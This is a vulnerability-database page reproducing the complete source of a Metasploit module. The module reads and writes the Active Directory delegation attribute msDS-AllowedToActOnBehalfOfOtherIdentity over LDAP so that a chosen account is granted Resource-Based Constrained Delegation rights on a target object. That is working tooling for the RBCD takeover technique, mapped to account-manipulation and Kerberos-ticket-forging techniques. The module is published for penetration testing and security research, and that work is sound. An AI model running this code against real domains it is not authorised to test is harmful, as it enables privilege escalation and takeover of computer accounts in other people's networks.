Lucene search
K

Role Base Constrained Delegation

🗓️ 31 Oct 2022 19:51:26Reported by Podalirius, Charlie Bromberg, Spencer McIntyreType 
metasploit
 metasploit
🔗 www.rapid7.com👁 311 Views

Configure Role Based Constrained Delegation by adding access control entry to allow account specified in DELEGATE_FROM to object specified in DELEGATE_T

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::LDAP::ActiveDirectory
  include Msf::OptionalSession::LDAP

  ATTRIBUTE = 'msDS-AllowedToActOnBehalfOfOtherIdentity'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Role Base Constrained Delegation',
        'Description' => %q{
          This module can read and write the necessary LDAP attributes to configure a particular object for Role Based
          Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account
          specified in DELEGATE_FROM to the object specified in DELEGATE_TO. In order for this to succeed, the
          authenticated user must have write access to the target object (the object specified in DELEGATE_TO).
        },
        'Author' => [
          'Podalirius', # Remi Gascou (@podalirius_), Impacket reference implementation
          'Charlie Bromberg', # Charlie Bromberg (@_nwodtuhs), Impacket reference implementation
          'Spencer McIntyre' # module author
        ],
        'References' => [
          ['URL', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution'],
          ['URL', 'https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd'],
          ['URL', 'https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py'],
          ['ATT&CK', Mitre::Attack::Technique::T1098_ACCOUNT_MANIPULATION],
          ['ATT&CK', Mitre::Attack::Technique::T1558_STEAL_OR_FORGE_KERBEROS_TICKETS]
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          ['FLUSH', { 'Description' => 'Delete the security descriptor' }],
          ['READ', { 'Description' => 'Read the security descriptor' }],
          ['REMOVE', { 'Description' => 'Remove matching ACEs from the security descriptor DACL' }],
          ['WRITE', { 'Description' => 'Add an ACE to the security descriptor DACL' }]
        ],
        'DefaultAction' => 'READ',
        'Notes' => {
          'Stability' => [],
          'SideEffects' => [CONFIG_CHANGES], # REMOVE, FLUSH, WRITE all make changes
          'Reliability' => []
        }
      )
    )

    register_options([
      OptString.new('DELEGATE_TO', [ true, 'The delegation target' ]),
      OptString.new('DELEGATE_FROM', [ false, 'The delegation source' ])
    ])
  end

  def build_ace(sid)
    Rex::Proto::MsDtyp::MsDtypAce.new({
      header: {
        ace_type: Rex::Proto::MsDtyp::MsDtypAceType::ACCESS_ALLOWED_ACE_TYPE
      },
      body: {
        access_mask: Rex::Proto::MsDtyp::MsDtypAccessMask::ALL,
        sid: sid
      }
    })
  end

  def get_delegate_to_obj
    delegate_to = datastore['DELEGATE_TO']
    if delegate_to.blank?
      fail_with(Failure::BadConfig, 'The DELEGATE_TO option must be specified for this action.')
    end

    obj = adds_get_object_by_samaccountname(@ldap, delegate_to)
    if obj.nil? && !delegate_to.end_with?('$')
      obj = adds_get_object_by_samaccountname(@ldap, "#{delegate_to}$")
    end
    fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_to}") unless obj

    obj
  end

  def get_delegate_from_obj
    delegate_from = datastore['DELEGATE_FROM']
    if delegate_from.blank?
      fail_with(Failure::BadConfig, 'The DELEGATE_FROM option must be specified for this action.')
    end

    obj = adds_get_object_by_samaccountname(@ldap, delegate_from)
    if obj.nil? && !delegate_from.end_with?('$')
      obj = adds_get_object_by_samaccountname(@ldap, "#{delegate_from}$")
    end
    fail_with(Failure::NotFound, "Failed to find sAMAccountName: #{delegate_from}") unless obj

    obj
  end

  def check
    ldap_connect do |ldap|
      validate_bind_success!(ldap)

      if (@base_dn = datastore['BASE_DN'])
        print_status("User-specified base DN: #{@base_dn}")
      else
        print_status('Discovering base DN automatically')

        unless (@base_dn = ldap.base_dn)
          print_warning("Couldn't discover base DN!")
        end
      end
      @ldap = ldap

      obj = get_delegate_to_obj
      if obj.nil?
        return Exploit::CheckCode::Unknown('Failed to find the specified object.')
      end

      unless adds_obj_grants_permissions?(@ldap, obj, SecurityDescriptorMatcher::Allow.all(%i[RP WP]))
        return Exploit::CheckCode::Safe('The object can not be written to.')
      end

      Exploit::CheckCode::Vulnerable(
        'The object can be written to.',
        vuln: {
          resource: {
            ldap_dn: obj.dn
          },
          service: report_ldap_service
        }
      )
    end
  end

  def run
    ldap_connect do |ldap|
      validate_bind_success!(ldap)

      if (@base_dn = datastore['BASE_DN'])
        print_status("User-specified base DN: #{@base_dn}")
      else
        print_status('Discovering base DN automatically')

        unless (@base_dn = ldap.base_dn)
          print_warning("Couldn't discover base DN!")
        end
      end
      @ldap = ldap

      obj = get_delegate_to_obj

      send("action_#{action.name.downcase}", obj)
    end
  rescue Errno::ECONNRESET
    fail_with(Failure::Disconnected, 'The connection was reset.')
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e
    fail_with(Failure::NoAccess, e.message)
  rescue Net::LDAP::Error => e
    fail_with(Failure::Unknown, "#{e.class}: #{e.message}")
  end

  def action_read(obj)
    if obj[ATTRIBUTE].first.nil?
      print_status("The #{ATTRIBUTE} field is empty.")
      return
    end

    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(obj[ATTRIBUTE].first)
    if (sddl = sd_to_sddl(security_descriptor))
      vprint_status("#{ATTRIBUTE}: #{sddl}")
    end

    if security_descriptor.dacl.nil?
      print_status("The #{ATTRIBUTE} DACL field is empty.")
      return
    end

    print_status('Allowed accounts:')
    security_descriptor.dacl.aces.each do |ace|
      account_name = adds_get_object_by_sid(@ldap, ace.body.sid)
      if account_name
        print_status("  #{ace.body.sid} (#{account_name[:sAMAccountName].first})")
      else
        print_status("  #{ace.body.sid}")
      end
    end
  end

  def action_remove(obj)
    delegate_from = get_delegate_from_obj

    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(obj[ATTRIBUTE].first)
    unless security_descriptor.dacl && !security_descriptor.dacl.aces.empty?
      print_status('No DACL ACEs are present. No changes are necessary.')
      return
    end

    aces = security_descriptor.dacl.aces.snapshot
    aces.delete_if { |ace| ace.body.sid == delegate_from[:objectSid].first }
    delta = security_descriptor.dacl.aces.length - aces.length
    if delta == 0
      print_status('No DACL ACEs matched. No changes are necessary.')
      return
    else
      print_status("Removed #{delta} matching ACE#{delta > 1 ? 's' : ''}.")
    end
    security_descriptor.dacl.aces = aces
    # clear these fields so they'll be calculated automatically after the update
    security_descriptor.dacl.acl_count.clear
    security_descriptor.dacl.acl_size.clear

    @ldap.replace_attribute(obj.dn, ATTRIBUTE, security_descriptor.to_binary_s)
    validate_query_result!(@ldap.get_operation_result.table)

    print_good("Successfully updated the #{ATTRIBUTE} attribute.")
  end

  def action_flush(obj)
    unless obj[ATTRIBUTE]&.first
      print_status("The #{ATTRIBUTE} field is empty. No changes are necessary.")
      return
    end

    @ldap.delete_attribute(obj.dn, ATTRIBUTE)
    validate_query_result!(@ldap.get_operation_result.table)

    print_good("Successfully deleted the #{ATTRIBUTE} attribute.")
  end

  def action_write(obj)
    delegate_from = get_delegate_from_obj
    if obj[ATTRIBUTE]&.first
      _action_write_update(obj, delegate_from)
    else
      _action_write_create(obj, delegate_from)
    end
  end

  def _action_write_create(obj, delegate_from)
    vprint_status("Creating new #{ATTRIBUTE}...")
    delegate_from_sid = Rex::Proto::MsDtyp::MsDtypSid.read(delegate_from[:objectSid].first)
    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.new
    security_descriptor.owner_sid = Rex::Proto::MsDtyp::MsDtypSid.new('S-1-5-32-544')
    security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
    security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
    security_descriptor.dacl.aces << build_ace(delegate_from_sid)

    if (sddl = sd_to_sddl(security_descriptor))
      vprint_status("New #{ATTRIBUTE}: #{sddl}")
    end

    @ldap.add_attribute(obj.dn, ATTRIBUTE, security_descriptor.to_binary_s)
    validate_query_result!(@ldap.get_operation_result.table)

    print_good("Successfully created the #{ATTRIBUTE} attribute.")
    print_status('Added account:')
    print_status("  #{delegate_from_sid} (#{delegate_from[:sAMAccountName].first})")
  end

  def _action_write_update(obj, delegate_from)
    vprint_status("Updating existing #{ATTRIBUTE}...")
    security_descriptor = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(obj[ATTRIBUTE].first)

    if (sddl = sd_to_sddl(security_descriptor))
      vprint_status("Old #{ATTRIBUTE}: #{sddl}")
    end

    if security_descriptor.dacl
      if security_descriptor.dacl.aces.any? { |ace| ace.body.sid == delegate_from[:objectSid].first }
        print_status("Delegation from #{delegate_from[:sAMAccountName].first} to #{obj[:sAMAccountName].first} is already configured.")
      end
      # clear these fields so they'll be calculated automatically after the update
      security_descriptor.dacl.acl_count.clear
      security_descriptor.dacl.acl_size.clear
    else
      security_descriptor.control.dp = 1
      security_descriptor.dacl = Rex::Proto::MsDtyp::MsDtypAcl.new
      security_descriptor.dacl.acl_revision = Rex::Proto::MsDtyp::MsDtypAcl::ACL_REVISION_DS
    end

    delegate_from_sid = Rex::Proto::MsDtyp::MsDtypSid.read(delegate_from[:objectSid].first)
    security_descriptor.dacl.aces << build_ace(delegate_from_sid)

    if (sddl = sd_to_sddl(security_descriptor))
      vprint_status("New #{ATTRIBUTE}: #{sddl}")
    end

    @ldap.replace_attribute(obj.dn, ATTRIBUTE, security_descriptor.to_binary_s)
    validate_query_result!(@ldap.get_operation_result.table)

    print_good("Successfully updated the #{ATTRIBUTE} attribute.")
  end

  def sd_to_sddl(sd)
    sd.to_sddl_text
  rescue StandardError => e
    elog('failed to parse a binary security descriptor to SDDL', error: e)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation